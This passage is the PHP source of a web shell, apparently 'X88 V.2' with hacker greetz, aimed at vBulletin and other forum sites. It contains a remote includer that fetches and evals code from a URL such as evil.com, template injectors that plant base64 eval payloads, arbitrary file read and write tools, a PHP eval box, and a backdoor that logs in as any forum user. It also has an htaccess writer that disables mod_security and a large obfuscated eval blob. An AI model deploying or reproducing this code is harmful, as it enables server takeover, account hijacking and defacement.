$set_index .= "\'))}}{\${exit()}}</textarea>";
$ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='header'") or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
print '<p align="center"><a href="?a=indv&ty=fhome"><font face=pristina size="4" color="#008000">FORUMHOME</p></font></p></a>
<p align="center"><a href="?a=indv&ty=spa"><font face=pristina size="4" color="#008000">SPACER_OPEN</p></font></p></a>
<p align="center"><a href="?a=indv&ty=css"><font face=pristina size="4" color="#008000">CSS</p></font></p></a>
<p align="center"><a href="?a=indv&ty=hea"><font face=pristina size="4" color="#008000">Header</p></font></p></a>
';
exit;
}
if ($_GET[a]== 'incl'){
if (empty($_GET['fq'])){
echo '<title>includer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">InCluder<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print'
<div align="center">
<form action="" method="GET">
<input name="fq" type="text" value="http://" align="LEFT" size="30" /> <br>
<input type="hidden" name="a" value="incl">
<u><font size="2" color="#008000">Ex: http://evil.com/shell.txt</font></u><br>
<input type="submit" value=" Submit " />
</form>
';
print $f;
}else{
$file=implode("\n",file($_GET[fq]));
$kr=str_replace("<?php", "",$file);
$kr=str_replace("<?", "",$kr);
$kr=str_replace("?>", "",$kr);
eval($kr);
}
exit;
}
if ($_GET[a]=='kil'){
echo '<title>Vb Killer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb Killer<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if (empty($_POST[db])){
print $script.'
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
<div align="center">
<select size="1" name="template">
<option value="FAQ">FAQ</option>
<option value="FORUMHOME">FORUMHOME</option>
<option value="search_forums">search_forums</option>
<option value="SHOWGROUPS">SHOWGROUPS</option>
<option value="SHOWTHREAD">SHOWTHREAD</option>
<option value="CALENDAR">CALENDAR</option>
<option value="MEMBERINFO">MEMBERINFO</option>
<option value="footer">footer</option>
<option value="header">header</option>
<option value="headinclude">headinclude</option>
<option value="lostpw">lostpw</option>
<option value="memberlist">memberlist</option></select></p>
<input name="lo" type="text" value="Localhost" align="LEFT" size="18"/> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="15" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'Shell CodEs\') this.value = \'\';">Shell CodEs</textarea><br>
<input type="submit" value=" Change "/>';
}else{
$a ="{\${eval(base64_decode(\'";
$template = $_POST['template'];
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print'Done !!';}
}
print $f;
exit;
}
if ($_GET[a]=='ins'){
print $script.'<body bgcolor=#000000>
<title>VB CoDeSINseRter</title>
<p align="center"><b><font face=pristina color="#008000" size="4">VB CoDeSINseRter<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if (!$_POST[code]){
print '<div align="center">
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
<select size="1" name="t">
<option value="spacer_open">SPACER_OPEN</option>
<option value="spacer_close">SPACER_CLOSE</option>
</select></p>
<input name="lo" type="text" value="Localhost" align="LEFT" size="18"/> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="15" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'HTML CODES\') this.value = \'\';">HTML CODES</textarea><br>
<input type="submit" value=" INSERT " />';
}else{
$lost = $_POST[t];
$a ="{\${eval(base64_decode(\'";
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}' WHERE title ='".$lost."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print"Done !!";}
}
print $f;
exit;
}
if ($_GET[a]=="conf"){
print'<body bgcolor=#000000>
<title>ConFig Reader</title>
<p align="center"><b><font face=pristina color="#008000" size="4">ConFig Reader<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if($_POST[incle] != ""){
$file = @fopen($_POST[incle],r);
$data=@fread($file,1546768);
$data2 =str_replace("<","<",$data);
print '<div align="center"><textarea cols="70" rows="30">'.$data2.'</textarea>';
exit;
}else{
print'<div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: path ::</font><br>
<input name="incle" type="text" value="'.@getcwd().'" align="LEFT" size="45" /> <br>
<input type="submit" value=" Submit " />';
exit;
}
}
if ($_GET[a]=="fl"){
print'<body bgcolor=#000000>
<title>Edit File</title>
<p align="center"><b><font face=pristina color="#008000" size="4">Edit File<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if($_POST[incl] != ""){
$file = @fopen($_POST[incl],r);
$data=@fread($file,1546768);
$msr = str_replace("\\\\","\\",$_POST[incl]);
print '<form action="" method="POST"><div align="center"><font size="4" color="#008000">:: path ::</font><br>
<div align="center"><input name="incl" type="text" value="'.$msr.'" align="LEFT" size="45" /> <br><input type="submit" value=" Submit " /></form>
<form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name=\'kr\' cols="70" rows="30">'.htmlspecialchars($data).'</textarea><br><input type="submit" value=" Save " />';
exit;
}
if($_POST[kr]){
$fl = str_replace("\'","'",$_POST[kr]);
$fl = str_replace('\"','"',$fl);
$fl = str_replace('\\\\','\\',$fl);
$d = @fopen($_POST[incle], 'w');
@fwrite($d,$fl);
@fclose($d);
if($d){
print'<font size="4" color="#008000">Saved !!</font><br>';
exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>';
exit;}}
print'<div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: path ::</font><br>
<input name="incl" type="text" value="'.@getcwd().'" align="LEFT" size="45" /> <br>
<input type="submit" value=" Submit " />';
exit;
}
if($_GET[a]=="out"){
print'
<script>document.cookie="user=;";document.cookie="pass=;"; alert("YoU Have Been Logged out Succefully");window.location="?";</script>';
exit;
}
if ($_GET[a]=="ev"){
if(empty($_POST['php'])){
print $script.'<body bgcolor=#000000>
<title>EVAL PHP</title>
<p align="center"><b><font face=pristina color="#008000" size="4">EVAL PHP<br>~ Karar alShaMi ~</b></p>
<p align="center">
<div align="center">
<form name="frm" action="" method="POST" onsubmit="document.frm.php.value = encode64(document.frm.php.value)">
<textarea name="php" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'PHP\') this.value = \'\';">PHP</textarea><br>
<input type="submit" value=" EVAL " />';
}else{
eval(base64_decode($_POST[php]));
}
exit;
}
if ($_GET[a]=="dr"){
if(empty($_POST[user]) and empty($_POST[uid])){
print'<body bgcolor=#000000>
<title>Vb backdoor</title>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb backdoor<br>~ Karar alShaMi ~</b></p>
<p align="center"> <div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: User ::</font><br>
<input name="user" type="text" value="UserName" align="center" size="45" onfocus="if (this.value ==\'UserName\')this.value = \'\';"/> <input name="ok" type="hidden" value="user" align="center" ><br>
<input type="submit" value=" Submit " /><br><div align="center">
</form>
<form name="a" action="" method="POST">
<font size="4" color="#008000">:: Userid ::</font><br>
<input name="uid" type="text" value="User ID" align="center" size="45" onfocus="if (this.value ==\'User ID\')this.value = \'\';"/> <br>
<input type="submit" value=" Submit " />';
exit;
}else{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
if ($_POST[ok] == "user"){
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST[user] . "'");
}else{
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE userid = '".$_POST[uid]."'");
}
if (!$vbulletin->userinfo['userid']) die("Invalid informations!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_POST[user]);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
}
print'
<title>IQ SCRIPT</title>
<body bgcolor="#000000">
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center"><a href="?p=tooliq&a=vba"><font face=pristina size="4" color="#008000">Vb admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=nuke"><font face=pristina size="4" color="#008000">Nuke admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=wp"><font face=pristina size="4" color="#008000">WP admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=sym"><font face=pristina size="4" color="#008000">SYMLINK</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=indv"><font face=pristina size="4" color="#008000">Vb index Changer</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=incl"><font face=pristina size="4" color="#008000">InCluder</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=kil"><font face=pristina size="4" color="#008000">Vb Killer</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=ins"><font face=pristina size="4" color="#008000">VB CoDeSINseRter</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=conf"><font face=pristina size="4" color="#008000">ConFig Reader</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=ev"><font face=pristina size="4" color="#008000">EVAL PHP</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=fl"><font face=pristina size="4" color="#008000">Edit File</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=dr"><font face=pristina size="4" color="#008000">Vb Backdoor</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=out"><font face=pristina size="4" color="#008000">logout</p></font></p></a>
';
break;
break;
case 'about':
echo '<center><h1 class="style2"><strong><span class="style3">X88 V.2</span></strong></h1>
<p class="style2"> </p>
<p class="style4">ML7s Hacker & Namrod Hacker Priv8</p>
<p class="style4">Namrod <a href="mailto:[email protected]">[email protected]</a></p>
<font SIZE="3">
<p>ML7s Hacker <a href="mailto:[email protected]">[email protected]</a></p>
<p> </p>
</font>
<p class="style4">[ GreeTz T0 : AL.MaX HaCkEr - Hmei7 - Dr.Zer0 - Dr.S4d Hacker - Al3bar Hacker- kamtiez - King OF Control - MDMN EX-SHeLL - Anonymous - Lulzsec - GHT ]
</p></center>
';
break;
case 'htaphp':
if($act=="htacss")
echo "
";
switch ($hat){
case Forbidden:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "Forbidden done";
break;
case Temporarily:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Unavailable:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Error:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Acceptable:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "bone";
break;
case "php-4":
$j ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "AddType application/x-httpd-php4 .php";
eval(base64_decode($j));
echo "done";
break;
default:
echo "<table id=\"table7\" style=\"BORDER-RIGHT: black 2px solid; BORDER-TOP: black 2px solid; BORDER-LEFT: black 2px solid; BORDER-BOTTOM: black 2px solid\" width=\"100%\" bgColor=\"#003300\" color=\"black\">
<tr>
<td width=\"50%\"a>
<div style=\"font-weight: normal; font-size: 12px; color: whitesmoke; font-family: tahoma\" align=\"left\">
<p align=\"center\"><b><font face=\"sans ms\" size=\"3\">
<a href=\"?p=htaphp&?a=htaccess&hat=Forbidden\">Forbidden</a> - <a href=\"?p=htaphp&?a=htaccess&hat=Temporarily\">Service Temporarily </a>-
<a href=\"?p=htaphp&?a=htaccess&hat=Unavailable\"> Unavailable </a>- <a href=\"?p=htaphp&?a=htaccess&hat=Error\">Internal Server Error </a>-<a style=\"color: #dadada; text-decoration: none; font-family: tahoma; font-size: 13px\" href=\"?a=CMD\">
</a></font><font style=\"font-size: 13px\" color=\"#DADADA\"><a href=\"?p=htaphp&?a=htaccess&hat=Acceptable\"> Not
Acceptable</a></font><font face=\"sans ms\" size=\"3\"> -<a href=\"?p=htaphp&?a=htaccess&hat=php-4\"> Back version Php to 4 </a></font></b></div>
</td>
</tr>
</table>";
}
break;
case 'perl':
eval(gzinflate(str_rot13(base64_decode('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